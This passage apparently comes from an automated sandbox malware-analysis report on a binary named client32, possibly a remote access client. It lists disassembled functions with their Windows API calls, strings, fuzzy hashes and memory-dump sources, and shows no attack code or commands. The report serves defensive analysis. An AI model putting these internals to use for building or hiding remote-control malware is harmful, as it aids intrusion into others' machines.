                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 398584587-0
                                                                                                • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                                • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                                  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                                • _free.LIBCMT ref: 1100EE64
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • _free.LIBCMT ref: 1100EE77
                                                                                                • _free.LIBCMT ref: 1100EE8A
                                                                                                • _free.LIBCMT ref: 1100EE9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                • String ID:
                                                                                                • API String ID: 3515823920-0
                                                                                                • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                                • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                                Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                • wsprintfA.USER32 ref: 1114650E
                                                                                                • wsprintfA.USER32 ref: 11146524
                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                • API String ID: 3779116287-2600120591
                                                                                                • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                                • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                                Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 3550192930-0
                                                                                                • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                                • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                                Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                • String ID: "
                                                                                                • API String ID: 1443461169-123907689
                                                                                                • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,986DAFD2,756F13E0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                • String ID: Client$DisableGeolocation
                                                                                                • API String ID: 3315423714-4166767992
                                                                                                • Opcode ID: 5d1663d0a305c853fea387a780d7a28bd6cad3a65506310e32abe90b209ce448
                                                                                                • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                                • Opcode Fuzzy Hash: 5d1663d0a305c853fea387a780d7a28bd6cad3a65506310e32abe90b209ce448
                                                                                                • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                                Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMessageA.USER32 ref: 1102783A
                                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
                                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                                • TranslateMessage.USER32(?), ref: 11027850
                                                                                                • DispatchMessageA.USER32(?,?,?,?,?,?,?,?,1103081D), ref: 11027856
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                                • API String ID: 3212272093-2210386016
                                                                                                • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                                • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                                • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                                • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                                Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 1101792C
                                                                                                  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                  • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                                  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 11017842
                                                                                                  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                  • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                                                • SetEvent.KERNEL32(0000018C), ref: 11017A0D
                                                                                                • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                Strings
                                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                • API String ID: 3804766296-4122679463
                                                                                                • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                                • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                                Function 69CE5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5014
                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5034
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE503D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorFileLastModuleNameProc
                                                                                                • String ID: GetModuleFileNameExA
                                                                                                • API String ID: 4084229558-758377266
                                                                                                • Opcode ID: 1a803e590374fd50675fce8f29a3daa35610144252e381afa61b0a88f365a9c3
                                                                                                • Instruction ID: 23168c2e0b9711055ae8aeac55c40dda5c5ee5af4a6b502cf74628db470e45a2
                                                                                                • Opcode Fuzzy Hash: 1a803e590374fd50675fce8f29a3daa35610144252e381afa61b0a88f365a9c3
                                                                                                • Instruction Fuzzy Hash: 69F05E72600218ABD720CF94E944F5777A8EB48750F40852AF946D7640D671E8148BA1
                                                                                                Function 69CE4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FC4
                                                                                                • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,69CE8E0D,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FE4
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                • String ID: EnumProcessModules
                                                                                                • API String ID: 3858832252-3735562946
                                                                                                • Opcode ID: 3ff3d240cbceb423dce83de3ec263bf3e5d8ad26410f57ea73218476e7c6f4c8
                                                                                                • Instruction ID: 2ed92e9e4230fc9bee57b35d0ad217c6eef26e0e2c91dfa7d88e89165c08c3c3
                                                                                                • Opcode Fuzzy Hash: 3ff3d240cbceb423dce83de3ec263bf3e5d8ad26410f57ea73218476e7c6f4c8
                                                                                                • Instruction Fuzzy Hash: ADF08CB2600218AFD710DFA4E944F9B77A8FB48761F00C92AFA5AD7640D670E810CFA0
                                                                                                Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11138785
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
